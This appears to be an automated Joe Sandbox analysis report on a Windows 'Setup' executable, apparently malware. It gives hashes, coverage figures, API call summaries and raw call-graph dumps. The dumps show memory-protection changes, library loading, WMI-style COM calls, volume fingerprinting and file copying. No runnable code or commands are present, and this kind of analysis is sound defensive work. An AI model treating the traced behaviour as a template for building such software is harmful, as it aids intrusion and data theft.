File size:42'064 bytes
MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false


Execution Graph

Execution Coverage:34.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:5.4%
Total number of Nodes:149
Total number of Limit Nodes:7

                                                                                                                                                                                                                                Callgraph


                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 008EDA5A: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008EDA8A
                                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 008EDB1E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocGlobalInformationQuerySystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3737350999-0
                                                                                                                                                                                                                                • Opcode ID: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                                                                                                                                                                                                • Instruction ID: 9712cbb6ae0ee0c4deb69e51cb5d91d66728a6a7e7bb7db9430c2a020baf57e4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A5107B5E00249EFCB04DF99C880AAEB7B5FF49304F208559E915E7344D770AE45CBA1

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(?,00000A46), ref: 008EE2BE
                                                                                                                                                                                                                                  • Part of subcall function 008EDA5A: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008EDA8A
                                                                                                                                                                                                                                  • Part of subcall function 008ECFCA: LoadLibraryW.KERNELBASE(?), ref: 008ECFFB
                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 008EEDAF
                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 008EEDE2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocGlobalProtectVirtual$LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1966084984-0
                                                                                                                                                                                                                                • Opcode ID: 240aa55989c54137efdc20a0ee1ae1ca480df6d3202c4e1da627c4bf8a4fd026
                                                                                                                                                                                                                                • Instruction ID: b5fd6df51284a6fb5d6726954a45516e7c3cfd29841d7d6a88e0c93adb111e80
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 240aa55989c54137efdc20a0ee1ae1ca480df6d3202c4e1da627c4bf8a4fd026
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C92D7B5E00218AFCB54DF99C881EEEB7B6BF8D300F148698E509A7345E631AE45CF51

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 008ED3BC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                • Opcode ID: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                                                                                                                                                                                                • Instruction ID: 588a83cfb1be399de14a4af1bc62bd1690f046be8d9efd9b5e8ea2b950269bb5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5631CC75A00208FFCB04DF99C891F9EB7B9FF49314F208198E919AB391D631AE46DB54

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 008ED9AC
                                                                                                                                                                                                                                • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 008ED9DA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CreateWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2263783195-0

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 249 8ecfca-8ed006 call 8eda5a call 8ed59a LoadLibraryW
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 008EDA5A: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008EDA8A
                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(?), ref: 008ECFFB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocGlobalLibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3361179946-0

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 254 8eefea-8ef038 call 8ed4ca 259 8ef03a-8ef03c 254->259 260 8ef041-8ef079 254->260 261 8ef21d-8ef220 259->261 264 8ef08e-8ef0ba malloc 260->264 265 8ef07b-8ef089 260->265 266 8ef0c5-8ef0cb 264->266 265->261 268 8ef0cd-8ef0d4 266->268 269 8ef14b-8ef14f 266->269 272 8ef0df-8ef0e5 268->272 270 8ef173-8ef18a call 8ee0ba 269->270 271 8ef151-8ef16e 269->271 280 8ef18c-8ef1a9 270->280 281 8ef1ab-8ef1d7 270->281 271->261 273 8ef146 272->273 274 8ef0e7-8ef101 272->274 273->266 279 8ef106-8ef144 call 8eee5a 274->279 279->272 280->261 283 8ef1e2-8ef1ea 281->283 287 8ef20f-8ef216 283->287 288 8ef1ec-8ef20d 283->288 292 8ef21b 287->292 288->283 292->261
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 316 8eda5a-8eda68 317 8eda6a-8eda73 316->317 318 8eda76-8eda8f GlobalAlloc 316->318 317->318
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008EDA8A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:8.1%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:14.3%
                                                                                                                                                                                                                                Total number of Nodes:807
                                                                                                                                                                                                                                Total number of Limit Nodes:19
61862ed 27408->27409 27452 61872b3 27409->27452 27412 61872b3 std::_Lockit::_Lockit 7 API calls 27413 6186348 27412->27413 27416 618730b std::_Lockit::~_Lockit 2 API calls 27413->27416 27415 6186369 27425 61863db 27415->27425 27465 61821e0 76 API calls 7 library calls 27415->27465 27416->27415 27418 61863bf 27419 6186458 27418->27419 27420 61863cb 27418->27420 27467 61820f0 41 API calls 3 library calls 27419->27467 27466 61875bc 41 API calls std::_Facet_Register 27420->27466 27423 618643a 27428 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27423->27428 27424 61863f7 27424->27423 27427 6182620 41 API calls 27424->27427 27458 618730b 27425->27458 27426 618645d 27427->27423 27429 6185d04 27428->27429 27429->27351 27431 61875fa __EH_prolog3 27430->27431 27432 61872b3 std::_Lockit::_Lockit 7 API calls 27431->27432 27433 6187605 27432->27433 27441 6187636 27433->27441 27472 6187751 41 API calls 2 library calls 27433->27472 27435 618730b std::_Lockit::~_Lockit 2 API calls 27438 6187673 std::locale::_Setgloballocale 27435->27438 27436 6187618 27473 6187774 41 API calls std::locale::_Setgloballocale 27436->27473 27438->27355 27439 6187620 27474 6187546 15 API calls 2 library calls 27439->27474 27441->27435 27443 61878ef 27442->27443 27445 6185e4f 27443->27445 27475 618e6df 27443->27475 27445->27354 27445->27359 27448 6187956 27448->27445 27493 618cfb7 27448->27493 27450->27362 27451->27365 27453 61872c9 27452->27453 27454 61872c2 27452->27454 27456 6186324 27453->27456 27469 6187c62 EnterCriticalSection 27453->27469 27468 618e37a 6 API calls std::_Lockit::_Lockit 27454->27468 27456->27412 27456->27415 27459 618e388 27458->27459 27460 6187315 27458->27460 27471 618e363 LeaveCriticalSection 27459->27471 27461 6187328 27460->27461 27470 6187c70 LeaveCriticalSection 27460->27470 27461->27424 27464 618e38f 27464->27424 27465->27418 27466->27425 27467->27426 27468->27456 27469->27456 27470->27461 27471->27464 
27472->27436 27473->27439 27474->27441 27477 618e629 ___scrt_is_nonwritable_in_current_image 27475->27477 27476 618e63c 27507 618ee44 14 API calls __dosmaperr 27476->27507 27477->27476 27479 618e65e 27477->27479 27482 618e670 27479->27482 27483 618e663 27479->27483 27480 618e641 27508 618e279 39 API calls __wsopen_s 27480->27508 27499 6193dff 27482->27499 27509 618ee44 14 API calls __dosmaperr 27483->27509 27484 618793b 27484->27445 27492 618e01a 66 API calls __wsopen_s 27484->27492 27488 618e68c 27511 618e6c8 LeaveCriticalSection ___scrt_uninitialize_crt 27488->27511 27489 618e67f 27510 618ee44 14 API calls __dosmaperr 27489->27510 27492->27448 27494 618cfca __wsopen_s 27493->27494 27537 618ce92 27494->27537 27496 618cfd6 27548 618c8fb 39 API calls __wsopen_s 27496->27548 27498 618cfe2 27498->27445 27500 6193e0b ___scrt_is_nonwritable_in_current_image 27499->27500 27512 618e31b EnterCriticalSection 27500->27512 27502 6193e19 27513 6193ea3 27502->27513 27507->27480 27508->27484 27509->27484 27510->27484 27511->27484 27512->27502 27520 6193ec6 27513->27520 27514 6193f1e 27532 619413f 14 API calls 2 library calls 27514->27532 27516 6193f27 27533 6193bc1 14 API calls __dosmaperr 27516->27533 27519 6193f30 27522 6193e26 27519->27522 27534 61946f3 6 API calls std::_Lockit::_Lockit 27519->27534 27520->27514 27520->27520 27520->27522 27530 618d2a6 EnterCriticalSection 27520->27530 27531 618d2ba LeaveCriticalSection 27520->27531 27527 6193e5f 27522->27527 27524 6193f4f 27535 618d2a6 EnterCriticalSection 27524->27535 27526 6193f62 27526->27522 27536 618e363 LeaveCriticalSection 27527->27536 27529 618e679 27529->27488 27529->27489 27530->27520 27531->27520 27532->27516 27533->27519 27534->27524 27535->27526 27536->27529 27538 618ce9e ___scrt_is_nonwritable_in_current_image 27537->27538 27539 618cea8 27538->27539 27540 618cecb 27538->27540 27564 618e1fc 39 API calls 2 library calls 27539->27564 27542 618cec3 27540->27542 27549 618d2a6 EnterCriticalSection 27540->27549 
27542->27496 27544 618cee9 27550 618cf29 27544->27550 27546 618cef6 27565 618cf21 LeaveCriticalSection ___scrt_uninitialize_crt 27546->27565 27548->27498 27549->27544 27551 618cf59 27550->27551 27552 618cf36 27550->27552 27563 618cf51 27551->27563 27566 618cd68 27551->27566 27572 618e1fc 39 API calls 2 library calls 27552->27572 27557 618cf79 27574 6192502 27557->27574 27559 618cf85 27581 6193c8c 44 API calls __wsopen_s 27559->27581 27561 618cf8c 27561->27563 27582 6193bc1 14 API calls __dosmaperr 27561->27582 27563->27546 27564->27542 27565->27542 27567 618cd81 27566->27567 27571 618cda8 27566->27571 27568 6192502 ___scrt_uninitialize_crt 39 API calls 27567->27568 27567->27571 27569 618cd9d 27568->27569 27583 6193894 27569->27583 27573 6193f65 14 API calls ___free_lconv_mon 27571->27573 27572->27563 27573->27557 27575 619250e 27574->27575 27576 6192523 27574->27576 27594 618ee44 14 API calls __dosmaperr 27575->27594 27576->27559 27578 6192513 27595 618e279 39 API calls __wsopen_s 27578->27595 27580 619251e 27580->27559 27581->27561 27582->27563 27584 61938a0 ___scrt_is_nonwritable_in_current_image 27583->27584 27585 61938e1 27584->27585 27587 6193927 27584->27587 27593 61938a8 27584->27593 27586 618e1fc __wsopen_s 39 API calls 27585->27586 27586->27593 27588 6199714 __wsopen_s EnterCriticalSection 27587->27588 27589 619392d 27588->27589 27590 619394b 27589->27590 27591 61939a5 __wsopen_s 62 API calls 27589->27591 27592 619399d __wsopen_s LeaveCriticalSection 27590->27592 27591->27590 27592->27593 27593->27571 27594->27578 27595->27580 27598 618476a _Yarn 27596->27598 27600 618468a _Yarn 27596->27600 27597 618481e 27597->27372 27598->27597 27604 618d593 27598->27604 27600->27372 27601->27369 27602->27374 27603->27375 27605 618d5a6 __wsopen_s 27604->27605 27610 618d375 27605->27610 27607 618d5bb 27618 618c8fb 39 API calls __wsopen_s 27607->27618 27609 618d5c8 27609->27597 27611 618d383 27610->27611 27616 618d3ab 27610->27616 27612 618d390 27611->27612 27613 618d3b2 
27611->27613 27611->27616 27627 618e1fc 39 API calls 2 library calls 27612->27627 27619 618d2ce 27613->27619 27616->27607 27618->27609 27620 618d2da ___scrt_is_nonwritable_in_current_image 27619->27620 27628 618d2a6 EnterCriticalSection 27620->27628 27622 618d2e8 27629 618d329 27622->27629 27626 618d306 27626->27607 27627->27616 27628->27622 27637 61949f8 27629->27637 27635 618d2f5 27636 618d31d LeaveCriticalSection ___scrt_uninitialize_crt 27635->27636 27636->27626 27638 61949ba 39 API calls 27637->27638 27639 6194a09 27638->27639 27640 6194a58 27639->27640 27643 618d341 27639->27643 27641 6195d59 std::_Locinfo::_Locinfo_ctor 15 API calls 27640->27641 27642 6194a62 27641->27642 27644 6193bc1 ___free_lconv_mon 14 API calls 27642->27644 27646 618d3ec 27643->27646 27645 6194a6b 27644->27645 27645->27643 27649 618d3fe 27646->27649 27650 618d35f 27646->27650 27647 618d40c 27648 618e1fc __wsopen_s 39 API calls 27647->27648 27648->27650 27649->27647 27649->27650 27653 618d442 _Yarn 27649->27653 27655 6194aa3 64 API calls ___scrt_uninitialize_crt 27650->27655 27651 618cd68 ___scrt_uninitialize_crt 64 API calls 27651->27653 27652 6192502 ___scrt_uninitialize_crt 39 API calls 27652->27653 27653->27650 27653->27651 27653->27652 27654 6193894 __wsopen_s 64 API calls 27653->27654 27654->27653 27655->27635 27657 6185b0c 27656->27657 27658 6185a6d 27656->27658 27659 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27657->27659 27658->27657 27665 6185a77 27658->27665 27660 6185b19 27659->27660 27660->27382 27661 6185afa 27662 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27661->27662 27663 6185b08 27662->27663 27663->27382 27664 6185ac2 27668 6185ae3 27664->27668 27670 618d593 67 API calls 27664->27670 27665->27661 27665->27664 27666 6185aa8 27665->27666 27666->27661 27667 6185aad 27666->27667 27669 6187f1e 
__ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27667->27669 27671 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27668->27671 27672 6185abe 27669->27672 27673 6185adc 27670->27673 27674 6185af6 27671->27674 27672->27382 27673->27661 27673->27668 27674->27382 27675->27393 27676->27395 27677->27397 27678->27399 27679->27280 27680->27288 27682 618f833 27681->27682 27690 618f844 27681->27690 27683 6188cf0 std::locale::_Setgloballocale GetModuleHandleW 27682->27683 27685 618f838 27683->27685 27685->27690 27707 618f8e7 GetModuleHandleExW 27685->27707 27687 618f882 27687->27007 27692 618f6b2 27690->27692 27691 618f897 27693 618f6be ___scrt_is_nonwritable_in_current_image 27692->27693 27713 618e31b EnterCriticalSection 27693->27713 27695 618f6c8 27714 618f71e 27695->27714 27697 618f6d5 27718 618f6f3 27697->27718 27700 618f89d 27723 618f8ce 27700->27723 27702 618f8a7 27703 618f8bb 27702->27703 27704 618f8ab GetCurrentProcess TerminateProcess 27702->27704 27705 618f8e7 std::locale::_Setgloballocale 3 API calls 27703->27705 27704->27703 27706 618f8c3 ExitProcess 27705->27706 27708 618f926 GetProcAddress 27707->27708 27709 618f947 27707->27709 27708->27709 27710 618f93a 27708->27710 27711 618f94d FreeLibrary 27709->27711 27712 618f956 27709->27712 27710->27709 27711->27712 27712->27690 27713->27695 27716 618f72a ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 27714->27716 27715 618f78e std::locale::_Setgloballocale 27715->27697 27716->27715 27721 6190192 14 API calls 2 library calls 27716->27721 27722 618e363 LeaveCriticalSection 27718->27722 27720 618f6e1 27720->27687 27720->27700 27721->27715 27722->27720 27726 61982dd 5 API calls std::locale::_Setgloballocale 27723->27726 27725 618f8d3 std::locale::_Setgloballocale 27725->27702 27726->27725 27727->27035 27728->27033 26866 30b7b2 CoSetProxyBlanket 26867 3087f2 26869 308811 26867->26869 
26868 3088db FreeLibrary 26870 3088ec 26868->26870 26869->26868 26869->26869 27729 3163d2 RtlAllocateHeap 26871 319779 26872 3197b0 26871->26872 26874 3197ee 26872->26874 26875 319510 LdrInitializeThunk 26872->26875 26875->26874 26876 2ed5e6 26877 2ed610 26876->26877 26894 2ffd20 26877->26894 26879 2ed7f9 26898 2fff40 26879->26898 26881 2ed819 26910 301aa0 26881->26910 26883 2ed839 26884 3023d0 LdrInitializeThunk 26883->26884 26885 2ed842 26884->26885 26886 302740 CopyFileW LdrInitializeThunk 26885->26886 26887 2ed84b 26886->26887 26888 304ff0 LdrInitializeThunk 26887->26888 26889 2ed854 26888->26889 26890 3041f0 LdrInitializeThunk 26889->26890 26891 2ed874 26890->26891 26892 30da40 6 API calls 26891->26892 26893 2ed89d 26892->26893 26895 2ffd30 26894->26895 26913 2fb2c0 26895->26913 26897 2fff1f 26897->26879 26899 2fff4e 26898->26899 26922 31d310 LdrInitializeThunk 26899->26922 26901 300014 26903 2fff1f 26901->26903 26904 2ffd30 26901->26904 26905 3000d1 26901->26905 26923 31d700 LdrInitializeThunk 26901->26923 26903->26881 26909 2fb2c0 LdrInitializeThunk 26904->26909 26924 31d430 LdrInitializeThunk 26905->26924 26907 300102 26907->26903 26925 31d310 LdrInitializeThunk 26907->26925 26909->26903 26912 301acd 26910->26912 26926 31d310 LdrInitializeThunk 26912->26926 26914 2fb2d0 26913->26914 26917 31cd70 26914->26917 26916 2fb324 26916->26897 26916->26916 26918 31cd90 26917->26918 26919 31cece 26918->26919 26921 319510 LdrInitializeThunk 26918->26921 26919->26916 26921->26919 26922->26901 26923->26901 26924->26907 26925->26903 26926->26912 27730 308359 27731 308363 27730->27731 27734 313870 27731->27734 27735 31387e 27734->27735 27739 313953 27735->27739 27743 319510 LdrInitializeThunk 27735->27743 27736 30846b 27739->27736 27741 313a3a 27739->27741 27742 319510 LdrInitializeThunk 27739->27742 27741->27736 27744 319510 LdrInitializeThunk 27741->27744 27742->27739 27743->27735 27744->27741 26927 2f41a5 26928 2f4370 26927->26928 26929 2f41b3 26927->26929 26928->26928 
26929->26928 26930 31cd70 LdrInitializeThunk 26929->26930 26930->26929 26931 319fbb GetForegroundWindow 26935 31c9d0 26931->26935 26933 319fc9 GetForegroundWindow 26934 319fda 26933->26934 26936 31c9e0 26935->26936 26936->26933 26937 2ed063 CoInitializeSecurity 26938 2e8c60 26940 2e8c6c 26938->26940 26939 2e8f31 ExitProcess 26940->26939 26941 2e8f2c 26940->26941 26942 2e8c81 GetCurrentThreadId 26940->26942 26952 319410 FreeLibrary 26941->26952 26944 2e8cba GetForegroundWindow 26942->26944 26946 2e8e21 GetCurrentProcessId 26944->26946 26947 2e8ed1 26944->26947 26946->26947 26947->26941 26951 2ed030 CoInitializeEx 26947->26951 26952->26939 27751 2fd080 27752 2fd0d0 27751->27752 27753 2fd08e 27751->27753 27757 2fd190 27753->27757 27758 2fd1a0 27757->27758 27758->27758 27759 31cd70 LdrInitializeThunk 27758->27759 27760 2fd2b1 27759->27760 27761 2ff31f 27762 2ff380 27761->27762 27763 31cd70 LdrInitializeThunk 27762->27763 27765 2ff4ef 27763->27765 27764 31cd70 LdrInitializeThunk 27764->27765 27765->27764 27765->27765 26953 313ba0 26954 313c00 CoCreateInstance 26953->26954 26956 3141b5 26954->26956 26957 313caf SysAllocString 26954->26957 26958 3141cd GetVolumeInformationW 26956->26958 26960 313d3a 26957->26960 26967 3141e8 26958->26967 26961 3141a1 SysFreeString 26960->26961 26962 313d49 CoSetProxyBlanket 26960->26962 26961->26956 26963 314197 26962->26963 26964 313d69 SysAllocString 26962->26964 26963->26961 26966 313e40 26964->26966 26966->26966 26968 313e71 SysAllocString 26966->26968 26969 313e98 26968->26969 26970 31417e SysFreeString SysFreeString 26969->26970 26971 314174 26969->26971 26972 313edc VariantInit 26969->26972 26970->26963 26971->26970 26974 313f40 26972->26974 26973 314163 VariantClear 26973->26971 26974->26973 27771 316480 27772 3164b0 27771->27772 27774 3164ee 27772->27774 27777 319510 LdrInitializeThunk 27772->27777 27774->27774 27775 3165e9 27774->27775 27778 319510 LdrInitializeThunk 27774->27778 27777->27774 27778->27775 27779 2f011d 27782 
2f0140 27779->27782 27780 2ee503 27782->27780 27783 2f35b0 27782->27783 27784 2f35d0 27783->27784 27784->27784 27798 31cbd0 27784->27798 27786 2f377a 27787 2f379c 27786->27787 27790 2f3977 27786->27790 27791 2f37d9 27786->27791 27793 2f37ca 27786->27793 27802 31cf20 LdrInitializeThunk 27786->27802 27787->27790 27787->27791 27787->27793 27803 31d000 27787->27803 27790->27791 27811 319510 LdrInitializeThunk 27790->27811 27791->27780 27793->27790 27793->27791 27794 31cbd0 LdrInitializeThunk 27793->27794 27796 31d000 LdrInitializeThunk 27793->27796 27809 31cf20 LdrInitializeThunk 27793->27809 27810 319510 LdrInitializeThunk 27793->27810 27794->27793 27796->27793 27799 31cbf0 27798->27799 27800 31cd1e 27799->27800 27812 319510 LdrInitializeThunk 27799->27812 27800->27786 27802->27787 27804 31d030 27803->27804 27807 31d08e 27804->27807 27813 319510 LdrInitializeThunk 27804->27813 27805 31d13e 27805->27793 27807->27805 27814 319510 LdrInitializeThunk 27807->27814 27809->27793 27810->27793 27811->27791 27812->27800 27813->27807 27814->27805 27815 61966ac 27820 6196441 27815->27820 27818 61966eb 27821 619646f ___vcrt_FlsSetValue 27820->27821 27821->27821 27822 61965bf 27821->27822 27835 619c547 40 API calls 2 library calls 27821->27835 27826 61965ca 27822->27826 27838 618ee44 14 API calls __dosmaperr 27822->27838 27824 619669a 27839 618e279 39 API calls __wsopen_s 27824->27839 27826->27818 27832 619cf7a 27826->27832 27828 6196627 27828->27822 27836 619c547 40 API calls 2 library calls 27828->27836 27830 6196645 27830->27822 27837 619c547 40 API calls 2 library calls 27830->27837 27840 619c666 27832->27840 27835->27828 27836->27830 27837->27822 27838->27824 27839->27826 27843 619c672 ___scrt_is_nonwritable_in_current_image 27840->27843 27841 619c679 27898 618ee44 14 API calls __dosmaperr 27841->27898 27843->27841 27845 619c6a4 27843->27845 27844 619c67e 27899 618e279 39 API calls __wsopen_s 27844->27899 27851 619cc50 27845->27851 27848 619c688 27848->27818 27901 619ca2c 
27851->27901 27854 619cc9b 27919 61997ec 27854->27919 27855 619cc82 27933 618ee31 14 API calls __dosmaperr 27855->27933 27859 619cca9 27935 618ee31 14 API calls __dosmaperr 27859->27935 27860 619ccc0 27932 619c997 CreateFileW 27860->27932 27864 619c6c8 27900 619c6fb LeaveCriticalSection __wsopen_s 27864->27900 27865 619ccae 27936 618ee44 14 API calls __dosmaperr 27865->27936 27866 619ccf9 27867 619cd76 GetFileType 27866->27867 27870 619cd4b GetLastError 27866->27870 27937 619c997 CreateFileW 27866->27937 27871 619cdc8 27867->27871 27872 619cd81 GetLastError 27867->27872 27869 619cc87 27934 618ee44 14 API calls __dosmaperr 27869->27934 27938 618edea 14 API calls __dosmaperr 27870->27938 27941 6199737 15 API calls 2 library calls 27871->27941 27939 618edea 14 API calls __dosmaperr 27872->27939 27876 619cd8f CloseHandle 27876->27869 27877 619cdb8 27876->27877 27940 618ee44 14 API calls __dosmaperr 27877->27940 27879 619cd3e 27879->27867 27879->27870 27881 619cde9 27883 619ce35 27881->27883 27942 619cba6 73 API calls 2 library calls 27881->27942 27882 619cdbd 27882->27869 27888 619ce3c 27883->27888 27944 619c741 73 API calls 3 library calls 27883->27944 27886 619ce6a 27887 619ce78 27886->27887 27886->27888 27887->27864 27890 619cef4 CloseHandle 27887->27890 27943 6193d2f 42 API calls __wsopen_s 27888->27943 27945 619c997 CreateFileW 27890->27945 27892 619cf1f 27893 619cf29 GetLastError 27892->27893 27894 619cf55 27892->27894 27946 618edea 14 API calls __dosmaperr 27893->27946 27894->27864 27896 619cf35 27947 61998ff 15 API calls 2 library calls 27896->27947 27898->27844 27899->27848 27900->27848 27902 619ca4d 27901->27902 27907 619ca67 27901->27907 27902->27907 27955 618ee44 14 API calls __dosmaperr 27902->27955 27905 619ca5c 27956 618e279 39 API calls __wsopen_s 27905->27956 27948 619c9bc 27907->27948 27908 619cace 27918 619cb21 27908->27918 27959 61904a1 39 API calls 2 library calls 27908->27959 27909 619ca9f 27909->27908 27957 618ee44 14 API calls __dosmaperr 
